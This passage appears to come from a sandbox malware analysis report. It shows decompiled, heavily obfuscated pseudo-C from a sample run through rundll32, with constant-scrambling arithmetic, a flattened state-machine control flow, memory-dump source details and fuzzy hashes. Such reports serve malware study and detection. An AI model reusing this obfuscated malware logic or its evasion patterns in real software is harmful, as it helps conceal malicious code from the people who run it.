                                                                                                                                  				_v228 = _v228 ^ 0x8d46dccd;
                                                                                                                                  				_v228 = _v228 / _t743;
                                                                                                                                  				_v228 = _v228 ^ 0x0183fb21;
                                                                                                                                  				_v132 = 0x744574;
                                                                                                                                  				_t744 = 0x2d;
                                                                                                                                  				_v132 = _v132 * 0x27;
                                                                                                                                  				_v132 = _v132 ^ 0x11b9ba9e;
                                                                                                                                  				_v384 = 0x4471dc;
                                                                                                                                  				_v384 = _v384 ^ 0x8273491f;
                                                                                                                                  				_v384 = _v384 / _t744;
                                                                                                                                  				_v384 = _v384 + 0xffffe0da;
                                                                                                                                  				_v384 = _v384 ^ 0x02e26e3a;
                                                                                                                                  				_v324 = 0x605f40;
                                                                                                                                  				_v324 = _v324 + 0xffffce94;
                                                                                                                                  				_v324 = _v324 + 0xffff95c1;
                                                                                                                                  				_v324 = _v324 >> 6;
                                                                                                                                  				_v324 = _v324 ^ 0x0001f278;
                                                                                                                                  				_v380 = 0xfa4dc1;
                                                                                                                                  				_t745 = 0x17;
                                                                                                                                  				_v380 = _v380 * 0x71;
                                                                                                                                  				_v380 = _v380 ^ 0x12ce666f;
                                                                                                                                  				_v380 = _v380 | 0xc76ff931;
                                                                                                                                  				_v380 = _v380 ^ 0xfff34e85;
                                                                                                                                  				_v172 = 0xf73d33;
                                                                                                                                  				_v172 = _v172 >> 7;
                                                                                                                                  				_v172 = _v172 ^ 0x0001a374;
                                                                                                                                  				_v364 = 0xb38f71;
                                                                                                                                  				_v364 = _v364 + 0x4143;
                                                                                                                                  				_v364 = _v364 ^ 0x53c53aac;
                                                                                                                                  				_v364 = _v364 / _t745;
                                                                                                                                  				_v364 = _v364 ^ 0x03acc109;
                                                                                                                                  				_v260 = 0xa91f99;
                                                                                                                                  				_v260 = _v260 >> 0xa;
                                                                                                                                  				_v260 = _v260 ^ 0xc9224c65;
                                                                                                                                  				_v260 = _v260 ^ 0xc926367a;
                                                                                                                                  				_v284 = 0x5ea8fe;
                                                                                                                                  				_v284 = _v284 * 0x3e;
                                                                                                                                  				_v284 = _v284 | 0x757fbe3f;
                                                                                                                                  				_v284 = _v284 ^ 0x77fedad5;
                                                                                                                                  				_v264 = 0xc1651a;
                                                                                                                                  				_v264 = _v264 / _t745;
                                                                                                                                  				_v264 = _v264 + 0x650c;
                                                                                                                                  				_v264 = _v264 ^ 0x00066731;
                                                                                                                                  				_v372 = 0xd53751;
                                                                                                                                  				_v372 = _v372 >> 0x10;
                                                                                                                                  				_v372 = _v372 * 0x50;
                                                                                                                                  				_v372 = _v372 ^ 0xc5a53504;
                                                                                                                                  				_v372 = _v372 ^ 0xc5a85656;
                                                                                                                                  				_v220 = 0x28743;
                                                                                                                                  				_v220 = _v220 | 0x747e4fe0;
                                                                                                                                  				_v220 = _v220 >> 8;
                                                                                                                                  				_v220 = _v220 ^ 0x0078aec3;
                                                                                                                                  				_v356 = 0x673303;
                                                                                                                                  				_v356 = _v356 + 0xffff3afb;
                                                                                                                                  				_v356 = _v356 >> 2;
                                                                                                                                  				_t746 = 0x76;
                                                                                                                                  				_t842 = 0x6cd454e;
                                                                                                                                  				_v96 = 0x100;
                                                                                                                                  				_t840 = 0xcf5796f;
                                                                                                                                  				_v356 = _v356 * 9;
                                                                                                                                  				_v356 = _v356 ^ 0x00e12344;
                                                                                                                                  				_v232 = 0xe5489f;
                                                                                                                                  				_v232 = _v232 * 0x62;
                                                                                                                                  				_v232 = _v232 ^ 0x422e6763;
                                                                                                                                  				_v232 = _v232 ^ 0x15e3beef;
                                                                                                                                  				_v144 = 0x9d1c0d;
                                                                                                                                  				_v144 = _v144 | 0x5a9db401;
                                                                                                                                  				_v144 = _v144 ^ 0x5a9ceaa6;
                                                                                                                                  				_v328 = 0xaba5b0;
                                                                                                                                  				_v328 = _v328 + 0xfc55;
                                                                                                                                  				_v328 = _v328 * 0x37;
                                                                                                                                  				_v328 = _v328 * 0x78;
                                                                                                                                  				_v328 = _v328 ^ 0x62b938e2;
                                                                                                                                  				_v168 = 0x51360e;
                                                                                                                                  				_v168 = _v168 << 2;
                                                                                                                                  				_v168 = _v168 ^ 0x014a45e2;
                                                                                                                                  				_v176 = 0x11fbeb;
                                                                                                                                  				_v176 = _v176 << 0xa;
                                                                                                                                  				_v176 = _v176 ^ 0x47e89d0f;
                                                                                                                                  				_v216 = 0x8fcc87;
                                                                                                                                  				_v216 = _v216 / _t746;
                                                                                                                                  				_v216 = _v216 ^ 0xd2cd5e41;
                                                                                                                                  				_v216 = _v216 ^ 0xd2c9cc36;
                                                                                                                                  				_v184 = 0x8a666a;
                                                                                                                                  				_v184 = _v184 * 0x6c;
                                                                                                                                  				_v184 = _v184 ^ 0x3a66624b;
                                                                                                                                  				_v288 = 0x12fc4d;
                                                                                                                                  				_v288 = _v288 ^ 0x84b68421;
                                                                                                                                  				_v288 = _v288 * 0x77;
                                                                                                                                  				_v288 = _v288 ^ 0xa87aad10;
                                                                                                                                  				_v296 = 0xb3f337;
                                                                                                                                  				_v296 = _v296 >> 1;
                                                                                                                                  				_v296 = _v296 + 0xffffa2d0;
                                                                                                                                  				_v296 = _v296 + 0xffff98aa;
                                                                                                                                  				_v296 = _v296 ^ 0x0050e375;
                                                                                                                                  				_v160 = 0xa98b94;
                                                                                                                                  				_v160 = _v160 ^ 0x93f8baf3;
                                                                                                                                  				_v160 = _v160 ^ 0x935506dc;
                                                                                                                                  				_v208 = 0xd26eef;
                                                                                                                                  				_v208 = _v208 + 0xffff657d;
                                                                                                                                  				_v208 = _v208 << 5;
                                                                                                                                  				_v208 = _v208 ^ 0x1a3ecca6;
                                                                                                                                  				_v280 = 0xce1cc4;
                                                                                                                                  				_v280 = _v280 << 6;
                                                                                                                                  				_v280 = _v280 << 0x10;
                                                                                                                                  				_v280 = _v280 | 0xb3a7eb9b;
                                                                                                                                  				_v280 = _v280 ^ 0xb3a418cd;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t747 = 0xb34e23f;
                                                                                                                                  					while(1) {
                                                                                                                                  						L2:
                                                                                                                                  						while(1) {
                                                                                                                                  							L3:
                                                                                                                                  							_t690 = 0xa0b11f8;
                                                                                                                                  							do {
                                                                                                                                  								while(1) {
                                                                                                                                  									L4:
                                                                                                                                  									_t850 = _t725 - _t690;
                                                                                                                                  									if(_t850 > 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									if(_t850 == 0) {
                                                                                                                                  										_t700 = E002E4624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
                                                                                                                                  										_t847 = _t847 + 0x14;
                                                                                                                                  										__eflags = _t700;
                                                                                                                                  										_t747 = 0xb34e23f;
                                                                                                                                  										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
                                                                                                                                  										goto L2;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t725 == 0x24fa5ba) {
                                                                                                                                  											_push(_v212);
                                                                                                                                  											_push(_v156);
                                                                                                                                  											_t701 = E002EDCF7(_v376, 0x2d1984, __eflags);
                                                                                                                                  											_push(_v236);
                                                                                                                                  											_push(_v124);
                                                                                                                                  											_t704 = E002D9462(_t701, _v368,  &_v116, E002EDCF7(_v268, 0x2d1814, __eflags), _v256, _v136);
                                                                                                                                  											_t847 = _t847 + 0x24;
                                                                                                                                  											__eflags = _t704 - _v240;
                                                                                                                                  											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
                                                                                                                                  											E002DA8B0(_v352, _t701, _v360);
                                                                                                                                  											E002DA8B0(_v336, _t702, _v344);
                                                                                                                                  											_t840 = 0xcf5796f;
                                                                                                                                  											goto L13;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t725 == 0x505fe8e) {
                                                                                                                                  												_t631 =  &_v208; // 0x39346367
                                                                                                                                  												E002D957D(_v116, _v160,  *_t631, _v272, _v280);
                                                                                                                                  											} else {
                                                                                                                                  												if(_t725 == _t842) {
                                                                                                                                  													_push(_v340);
                                                                                                                                  													_push(_v180);
                                                                                                                                  													_t710 = E002EDCF7(_v148, 0x2d1854, __eflags);
                                                                                                                                  													_pop(_t763);
                                                                                                                                  													_t844 = _t710;
                                                                                                                                  													_t711 = 0x48;
                                                                                                                                  													_v104 = _t711;
                                                                                                                                  													_t713 = E002D1C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
                                                                                                                                  													_t847 = _t847 + 0x28;
                                                                                                                                  													__eflags = _t713 - _v164;
                                                                                                                                  													if(_t713 != _v164) {
                                                                                                                                  														_t725 = _t840;
                                                                                                                                  													} else {
                                                                                                                                  														_t834 =  *0x2f3dfc; // 0x0
                                                                                                                                  														E002DED7E(_v244, _t834, _v228,  &_v68, 0x40);
                                                                                                                                  														_t847 = _t847 + 0xc;
                                                                                                                                  														_t725 = 0x9bcfe4f;
                                                                                                                                  													}
                                                                                                                                  													E002DA8B0(_v132, _t844, _v384);
                                                                                                                                  													goto L13;
                                                                                                                                  												} else {
                                                                                                                                  													if(_t725 == 0x7252bf3) {
                                                                                                                                  														_t725 = 0x24fa5ba;
                                                                                                                                  														continue;
                                                                                                                                  													} else {
                                                                                                                                  														if(_t725 == _t819) {
                                                                                                                                  															_t717 = E002DB144(_v120, _v188, _v308, _v128, _v348, _v292);
                                                                                                                                  															_t847 = _t847 + 0x10;
                                                                                                                                  															__eflags = _t717 - _v152;
                                                                                                                                  															_t725 =  ==  ? _t842 : _t840;
                                                                                                                                  															while(1) {
                                                                                                                                  																L1:
                                                                                                                                  																_t747 = 0xb34e23f;
                                                                                                                                  																L2:
                                                                                                                                  																L3:
                                                                                                                                  																_t690 = 0xa0b11f8;
                                                                                                                                  																goto L4;
                                                                                                                                  															}
                                                                                                                                  														} else {
                                                                                                                                  															_t856 = _t725 - 0x9bcfe4f;
                                                                                                                                  															if(_t725 == 0x9bcfe4f) {
                                                                                                                                  																_push(_v172);
                                                                                                                                  																_push(_v380);
                                                                                                                                  																_t719 = E002EDCF7(_v324, 0x2d1854, _t856);
                                                                                                                                  																_pop(_t772);
                                                                                                                                  																E002DAA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
                                                                                                                                  																_t725 =  ==  ? 0xa0b11f8 : _t840;
                                                                                                                                  																E002DA8B0(_v220, _t719, _v356);
                                                                                                                                  																_t847 = _t847 + 0x2c;
                                                                                                                                  																L13:
                                                                                                                                  																_t842 = 0x6cd454e;
                                                                                                                                  																L32:
                                                                                                                                  																_t819 = 0x9b01f0f;
                                                                                                                                  																_t747 = 0xb34e23f;
                                                                                                                                  																_t690 = 0xa0b11f8;
                                                                                                                                  															}
                                                                                                                                  															goto L33;
                                                                                                                                  														}
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  									L36:
                                                                                                                                  									return _t846;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t725 - _t747;
                                                                                                                                  								if(_t725 == _t747) {
                                                                                                                                  									_t691 = E002D2BD9(_v112);
                                                                                                                                  									_t725 = 0xb500bcf;
                                                                                                                                  									__eflags = _t691;
                                                                                                                                  									_t846 =  !=  ? 1 : _t846;
                                                                                                                                  									goto L32;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _t725 - 0xb500bcf;
                                                                                                                                  									if(_t725 == 0xb500bcf) {
                                                                                                                                  										E002ECA69(_v112, _v168, _v176);
                                                                                                                                  										_t725 = 0xcc5fcc9;
                                                                                                                                  										goto L1;
                                                                                                                                  									} else {
                                                                                                                                  										__eflags = _t725 - 0xcc5fcc9;
                                                                                                                                  										if(_t725 == 0xcc5fcc9) {
                                                                                                                                  											E002DA958(_v216, _v108, _v184);
                                                                                                                                  											_t725 = _t840;
                                                                                                                                  											while(1) {
                                                                                                                                  												L1:
                                                                                                                                  												_t747 = 0xb34e23f;
                                                                                                                                  												goto L2;
                                                                                                                                  											}
                                                                                                                                  										} else {
                                                                                                                                  											__eflags = _t725 - _t840;
                                                                                                                                  											if(_t725 == _t840) {
                                                                                                                                  												E002DA958(_v288, _v120, _v296);
                                                                                                                                  												_t725 = 0x505fe8e;
                                                                                                                                  												while(1) {
                                                                                                                                  													L1:
                                                                                                                                  													_t747 = 0xb34e23f;
                                                                                                                                  													goto L2;
                                                                                                                                  												}
                                                                                                                                  											} else {
                                                                                                                                  												__eflags = _t725 - 0xec78b05;
                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                  													goto L33;
                                                                                                                                  												} else {
                                                                                                                                  													_v104 = _v96;
                                                                                                                                  													_t697 = E002D92C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
                                                                                                                                  													_t847 = _t847 + 0x14;
                                                                                                                                  													__eflags = _t697 - _v192;
                                                                                                                                  													_t819 = 0x9b01f0f;
                                                                                                                                  													_t747 = 0xb34e23f;
                                                                                                                                  													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
                                                                                                                                  													goto L3;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  								goto L36;
                                                                                                                                  								L33:
                                                                                                                                  							} while (_t725 != 0xc75135f);
                                                                                                                                  							goto L36;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x002dbf4b
                                                                                                                                  0x002dbf53
                                                                                                                                  0x002dbf5b
                                                                                                                                  0x002dbf63
                                                                                                                                  0x002dbf6b
                                                                                                                                  0x002dbf78
                                                                                                                                  0x002dbf7c
                                                                                                                                  0x002dbf84
                                                                                                                                  0x002dbf90
                                                                                                                                  0x002dbf93
                                                                                                                                  0x002dbf97
                                                                                                                                  0x002dbf9f
                                                                                                                                  0x002dbfa7
                                                                                                                                  0x002dbfaf
                                                                                                                                  0x002dbfbc
                                                                                                                                  0x002dbfc0
                                                                                                                                  0x002dbfc8
                                                                                                                                  0x002dbfcd
                                                                                                                                  0x002dbfd5
                                                                                                                                  0x002dbfe0
                                                                                                                                  0x002dbfeb
                                                                                                                                  0x002dbff8
                                                                                                                                  0x002dc007
                                                                                                                                  0x002dc00a
                                                                                                                                  0x002dc00e
                                                                                                                                  0x002dc013
                                                                                                                                  0x002dc01b
                                                                                                                                  0x002dc023
                                                                                                                                  0x002dc033
                                                                                                                                  0x002dc037
                                                                                                                                  0x002dc03c
                                                                                                                                  0x002dc044
                                                                                                                                  0x002dc04c
                                                                                                                                  0x002dc05f
                                                                                                                                  0x002dc062
                                                                                                                                  0x002dc069
                                                                                                                                  0x002dc074
                                                                                                                                  0x002dc07f
                                                                                                                                  0x002dc08a
                                                                                                                                  0x002dc095
                                                                                                                                  0x002dc0a2
                                                                                                                                  0x002dc0a6
                                                                                                                                  0x002dc0ae
                                                                                                                                  0x002dc0b6
                                                                                                                                  0x002dc0be
                                                                                                                                  0x002dc0c6
                                                                                                                                  0x002dc0ce
                                                                                                                                  0x002dc0d6
                                                                                                                                  0x002dc0de
                                                                                                                                  0x002dc0e6
                                                                                                                                  0x002dc0f1
                                                                                                                                  0x002dc0fc
                                                                                                                                  0x002dc107
                                                                                                                                  0x002dc112
                                                                                                                                  0x002dc11d
                                                                                                                                  0x002dc124
                                                                                                                                  0x002dc12f
                                                                                                                                  0x002dc137
                                                                                                                                  0x002dc13f
                                                                                                                                  0x002dc147
                                                                                                                                  0x002dc14c
                                                                                                                                  0x002dc154
                                                                                                                                  0x002dc166
                                                                                                                                  0x002dc16b
                                                                                                                                  0x002dc174
                                                                                                                                  0x002dc17f
                                                                                                                                  0x002dc18a
                                                                                                                                  0x002dc195
                                                                                                                                  0x002dc19d
                                                                                                                                  0x002dc1a8
                                                                                                                                  0x002dc1b0
                                                                                                                                  0x002dc1b8
                                                                                                                                  0x002dc1c0
                                                                                                                                  0x002dc1c5
                                                                                                                                  0x002dc1cd
                                                                                                                                  0x002dc1d8
                                                                                                                                  0x002dc1e3
                                                                                                                                  0x002dc1ee
                                                                                                                                  0x002dc1fa
                                                                                                                                  0x002dc1fd
                                                                                                                                  0x002dc201
                                                                                                                                  0x002dc206
                                                                                                                                  0x002dc20e
                                                                                                                                  0x002dc216
                                                                                                                                  0x002dc223
                                                                                                                                  0x002dc238
                                                                                                                                  0x002dc23b
                                                                                                                                  0x002dc242
                                                                                                                                  0x002dc24d
                                                                                                                                  0x002dc258
                                                                                                                                  0x002dc26e
                                                                                                                                  0x002dc275
                                                                                                                                  0x002dc280
                                                                                                                                  0x002dc293
                                                                                                                                  0x002dc296
                                                                                                                                  0x002dc29d
                                                                                                                                  0x002dc2a8
                                                                                                                                  0x002dc2b0
                                                                                                                                  0x002dc2c0
                                                                                                                                  0x002dc2c4
                                                                                                                                  0x002dc2cc
                                                                                                                                  0x002dc2d4
                                                                                                                                  0x002dc2dc
                                                                                                                                  0x002dc2e4
                                                                                                                                  0x002dc2ec
                                                                                                                                  0x002dc2f1
                                                                                                                                  0x002dc2f9
                                                                                                                                  0x002dc306
                                                                                                                                  0x002dc307
                                                                                                                                  0x002dc30b
                                                                                                                                  0x002dc313
                                                                                                                                  0x002dc31b
                                                                                                                                  0x002dc323
                                                                                                                                  0x002dc32e
                                                                                                                                  0x002dc336
                                                                                                                                  0x002dc341
                                                                                                                                  0x002dc349
                                                                                                                                  0x002dc351
                                                                                                                                  0x002dc361
                                                                                                                                  0x002dc365
                                                                                                                                  0x002dc36d
                                                                                                                                  0x002dc378
                                                                                                                                  0x002dc380
                                                                                                                                  0x002dc38b
                                                                                                                                  0x002dc396
                                                                                                                                  0x002dc3a3
                                                                                                                                  0x002dc3a7
                                                                                                                                  0x002dc3af
                                                                                                                                  0x002dc3b7
                                                                                                                                  0x002dc3cb
                                                                                                                                  0x002dc3d2
                                                                                                                                  0x002dc3dd
                                                                                                                                  0x002dc3e8
                                                                                                                                  0x002dc3f0
                                                                                                                                  0x002dc3fa
                                                                                                                                  0x002dc3fe
                                                                                                                                  0x002dc406
                                                                                                                                  0x002dc40e
                                                                                                                                  0x002dc419
                                                                                                                                  0x002dc424
                                                                                                                                  0x002dc42c
                                                                                                                                  0x002dc437
                                                                                                                                  0x002dc43f
                                                                                                                                  0x002dc447
                                                                                                                                  0x002dc455
                                                                                                                                  0x002dc456
                                                                                                                                  0x002dc45b
                                                                                                                                  0x002dc466
                                                                                                                                  0x002dc46b
                                                                                                                                  0x002dc46f
                                                                                                                                  0x002dc477
                                                                                                                                  0x002dc48a
                                                                                                                                  0x002dc491
                                                                                                                                  0x002dc49c
                                                                                                                                  0x002dc4a7
                                                                                                                                  0x002dc4b2
                                                                                                                                  0x002dc4bd
                                                                                                                                  0x002dc4c8
                                                                                                                                  0x002dc4d0
                                                                                                                                  0x002dc4dd
                                                                                                                                  0x002dc4e6
                                                                                                                                  0x002dc4ea
                                                                                                                                  0x002dc4f2
                                                                                                                                  0x002dc4fd
                                                                                                                                  0x002dc505
                                                                                                                                  0x002dc510
                                                                                                                                  0x002dc51b
                                                                                                                                  0x002dc523
                                                                                                                                  0x002dc52e
                                                                                                                                  0x002dc542
                                                                                                                                  0x002dc549
                                                                                                                                  0x002dc554
                                                                                                                                  0x002dc55f
                                                                                                                                  0x002dc572
                                                                                                                                  0x002dc579
                                                                                                                                  0x002dc584
                                                                                                                                  0x002dc594
                                                                                                                                  0x002dc5a1
                                                                                                                                  0x002dc5a5
                                                                                                                                  0x002dc5ad
                                                                                                                                  0x002dc5b5
                                                                                                                                  0x002dc5b9
                                                                                                                                  0x002dc5c1
                                                                                                                                  0x002dc5c9
                                                                                                                                  0x002dc5d1
                                                                                                                                  0x002dc5dc
                                                                                                                                  0x002dc5e7
                                                                                                                                  0x002dc5f2
                                                                                                                                  0x002dc5fd
                                                                                                                                  0x002dc608
                                                                                                                                  0x002dc610
                                                                                                                                  0x002dc61b
                                                                                                                                  0x002dc623
                                                                                                                                  0x002dc628
                                                                                                                                  0x002dc62d
                                                                                                                                  0x002dc635
                                                                                                                                  0x002dc63d

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                                  • API String ID: 0-258179307
                                                                                                                                  • Opcode ID: 78ee6cec11cb2b19c1015130cd9c99dd7dc60cd7f9cfda0b08fa834503fb8993
                                                                                                                                  • Instruction ID: 5b423e24b1cb9fb5fdfca2a603aa9412b4e19df8e6cf8e7222984cf29ec71482
                                                                                                                                  • Opcode Fuzzy Hash: 78ee6cec11cb2b19c1015130cd9c99dd7dc60cd7f9cfda0b08fa834503fb8993
                                                                                                                                  • Instruction Fuzzy Hash: 9972F371509381DFD378CF25C58AA9BBBE2BBC4304F20891EE6DA86260D7B18955DF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			E002E4B87(void* __ecx) {
                                                                                                                                  				char _v524;
                                                                                                                                  				char _v1044;
                                                                                                                                  				char _v1564;
                                                                                                                                  				char _v2084;
                                                                                                                                  				char _v2604;
                                                                                                                                  				signed int _v2608;
                                                                                                                                  				intOrPtr _v2612;
                                                                                                                                  				intOrPtr _v2616;
                                                                                                                                  				intOrPtr _v2620;
                                                                                                                                  				intOrPtr _v2624;
                                                                                                                                  				char _v2628;
                                                                                                                                  				intOrPtr _v2632;
                                                                                                                                  				char _v2636;
                                                                                                                                  				signed int _v2640;
                                                                                                                                  				signed int _v2644;
                                                                                                                                  				signed int _v2648;
                                                                                                                                  				signed int _v2652;
                                                                                                                                  				signed int _v2656;
                                                                                                                                  				signed int _v2660;
                                                                                                                                  				signed int _v2664;
                                                                                                                                  				signed int _v2668;
                                                                                                                                  				signed int _v2672;
                                                                                                                                  				signed int _v2676;
                                                                                                                                  				signed int _v2680;
                                                                                                                                  				signed int _v2684;
                                                                                                                                  				signed int _v2688;
                                                                                                                                  				signed int _v2692;
                                                                                                                                  				signed int _v2696;
                                                                                                                                  				signed int _v2700;
                                                                                                                                  				signed int _v2704;
                                                                                                                                  				signed int _v2708;
                                                                                                                                  				signed int _v2712;
                                                                                                                                  				signed int _v2716;
                                                                                                                                  				signed int _v2720;
                                                                                                                                  				signed int _v2724;
                                                                                                                                  				signed int _v2728;
                                                                                                                                  				signed int _v2732;
                                                                                                                                  				signed int _v2736;
                                                                                                                                  				signed int _v2740;
                                                                                                                                  				signed int _v2744;
                                                                                                                                  				signed int _v2748;
                                                                                                                                  				signed int _v2752;
                                                                                                                                  				signed int _v2756;
                                                                                                                                  				signed int _v2760;
                                                                                                                                  				signed int _v2764;
                                                                                                                                  				signed int _v2768;
                                                                                                                                  				signed int _v2772;
                                                                                                                                  				signed int _v2776;
                                                                                                                                  				signed int _v2780;
                                                                                                                                  				signed int _v2784;
                                                                                                                                  				signed int _v2788;
                                                                                                                                  				signed int _v2792;
                                                                                                                                  				signed int _v2796;
                                                                                                                                  				signed int _v2800;
                                                                                                                                  				signed int _v2804;
                                                                                                                                  				signed int _v2808;
                                                                                                                                  				signed int _v2812;
                                                                                                                                  				signed int _v2816;
                                                                                                                                  				signed int _v2820;
                                                                                                                                  				signed int _v2824;
                                                                                                                                  				signed int _v2828;
                                                                                                                                  				signed int _v2832;
                                                                                                                                  				signed int _v2836;
                                                                                                                                  				signed int _v2840;
                                                                                                                                  				signed int _v2844;
                                                                                                                                  				signed int _v2848;
                                                                                                                                  				signed int _v2852;
                                                                                                                                  				signed int _v2856;
                                                                                                                                  				signed int _v2860;
                                                                                                                                  				signed int _v2864;
                                                                                                                                  				signed int _v2868;
                                                                                                                                  				signed int _v2872;
                                                                                                                                  				signed int _v2876;
                                                                                                                                  				signed int _v2880;
                                                                                                                                  				signed int _v2884;
                                                                                                                                  				signed int _v2888;
                                                                                                                                  				signed int _v2892;
                                                                                                                                  				signed int _v2896;
                                                                                                                                  				signed int _v2900;
                                                                                                                                  				signed int _v2904;
                                                                                                                                  				signed int _v2908;
                                                                                                                                  				signed int _v2912;
                                                                                                                                  				signed int _v2916;
                                                                                                                                  				signed int _v2920;
                                                                                                                                  				signed int _v2924;
                                                                                                                                  				signed int _v2928;
                                                                                                                                  				void* _t703;
                                                                                                                                  				void* _t707;
                                                                                                                                  				signed int _t708;
                                                                                                                                  				signed int _t717;
                                                                                                                                  				void* _t730;
                                                                                                                                  				void* _t736;
                                                                                                                                  				signed int _t738;
                                                                                                                                  				signed int _t739;
                                                                                                                                  				signed int _t740;
                                                                                                                                  				signed int _t741;
                                                                                                                                  				signed int _t742;
                                                                                                                                  				signed int _t743;
                                                                                                                                  				signed int _t744;
                                                                                                                                  				signed int _t745;
                                                                                                                                  				void* _t758;
                                                                                                                                  				signed int _t798;
                                                                                                                                  				void* _t803;
                                                                                                                                  				void* _t804;
                                                                                                                                  				void* _t811;
                                                                                                                                  
                                                                                                                                  				_v2608 = _v2608 & 0x00000000;
                                                                                                                                  				_v2616 = 0xa2c333;
                                                                                                                                  				_v2612 = 0xd97943;
                                                                                                                                  				_v2696 = 0x74b91;
                                                                                                                                  				_v2696 = _v2696 + 0xffffab65;
                                                                                                                                  				_v2696 = _v2696 ^ 0x0006f6df;
                                                                                                                                  				_v2804 = 0x130b03;
                                                                                                                                  				_v2804 = _v2804 << 9;
                                                                                                                                  				_v2804 = _v2804 + 0x8374;
                                                                                                                                  				_v2804 = _v2804 ^ 0x26068974;
                                                                                                                                  				_v2876 = 0x240a80;
                                                                                                                                  				_v2876 = _v2876 >> 6;
                                                                                                                                  				_v2876 = _v2876 >> 5;
                                                                                                                                  				_v2876 = _v2876 ^ 0x3e269fec;
                                                                                                                                  				_v2876 = _v2876 ^ 0x3e253447;
                                                                                                                                  				_v2924 = 0x49db5b;
                                                                                                                                  				_v2924 = _v2924 + 0xd552;
                                                                                                                                  				_t803 = __ecx;
                                                                                                                                  				_t798 = 0xce4571;
                                                                                                                                  				_t738 = 0x27;
                                                                                                                                  				_v2924 = _v2924 / _t738;
                                                                                                                                  				_v2924 = _v2924 + 0x3019;
                                                                                                                                  				_v2924 = _v2924 ^ 0x0006d24f;
                                                                                                                                  				_v2796 = 0xf8ea63;
                                                                                                                                  				_v2796 = _v2796 << 3;
                                                                                                                                  				_v2796 = _v2796 + 0x8798;
                                                                                                                                  				_v2796 = _v2796 ^ 0x07c9cae5;
                                                                                                                                  				_v2864 = 0x679d3b;
                                                                                                                                  				_t739 = 0x25;
                                                                                                                                  				_v2864 = _v2864 * 0x7a;
                                                                                                                                  				_v2864 = _v2864 / _t739;
                                                                                                                                  				_v2864 = _v2864 << 0xc;
                                                                                                                                  				_v2864 = _v2864 ^ 0x5a5eda92;
                                                                                                                                  				_v2688 = 0xbc1f25;
                                                                                                                                  				_v2688 = _v2688 << 0xd;
                                                                                                                                  				_v2688 = _v2688 ^ 0x83e15555;
                                                                                                                                  				_v2700 = 0xc3e9b4;
                                                                                                                                  				_v2700 = _v2700 ^ 0x7e7d7a5b;
                                                                                                                                  				_v2700 = _v2700 ^ 0x7ebc2479;
                                                                                                                                  				_v2684 = 0x348655;
                                                                                                                                  				_v2684 = _v2684 + 0xffff5240;
                                                                                                                                  				_v2684 = _v2684 ^ 0x0038d539;
                                                                                                                                  				_v2836 = 0xc8c90d;
                                                                                                                                  				_v2836 = _v2836 | 0x6050777e;
                                                                                                                                  				_v2836 = _v2836 + 0xfffffb37;
                                                                                                                                  				_v2836 = _v2836 << 0xe;
                                                                                                                                  				_v2836 = _v2836 ^ 0x3ea8df0c;
                                                                                                                                  				_v2664 = 0x4ea234;
                                                                                                                                  				_v2664 = _v2664 ^ 0x152f142f;
                                                                                                                                  				_v2664 = _v2664 ^ 0x1568dd81;
                                                                                                                                  				_v2900 = 0xa78742;
                                                                                                                                  				_v2900 = _v2900 * 0x70;
                                                                                                                                  				_v2900 = _v2900 + 0x89c7;
                                                                                                                                  				_v2900 = _v2900 * 0x26;
                                                                                                                                  				_v2900 = _v2900 ^ 0xe13351a3;
                                                                                                                                  				_v2752 = 0x43c729;
                                                                                                                                  				_v2752 = _v2752 * 9;
                                                                                                                                  				_v2752 = _v2752 >> 0xc;
                                                                                                                                  				_v2752 = _v2752 ^ 0x0004a0a7;
                                                                                                                                  				_v2656 = 0x163ba0;
                                                                                                                                  				_v2656 = _v2656 | 0x3b2cca0a;
                                                                                                                                  				_v2656 = _v2656 ^ 0x3b3c61f3;
                                                                                                                                  				_v2800 = 0x539f85;
                                                                                                                                  				_v2800 = _v2800 + 0xffff9927;
                                                                                                                                  				_v2800 = _v2800 >> 0xd;
                                                                                                                                  				_v2800 = _v2800 ^ 0x000ca278;
                                                                                                                                  				_v2892 = 0xaa9f70;
                                                                                                                                  				_v2892 = _v2892 | 0xffd04745;
                                                                                                                                  				_t740 = 0x33;
                                                                                                                                  				_v2892 = _v2892 * 0x48;
                                                                                                                                  				_v2892 = _v2892 + 0xabed;
                                                                                                                                  				_v2892 = _v2892 ^ 0xfe85b4b6;
                                                                                                                                  				_v2728 = 0x66b1f8;
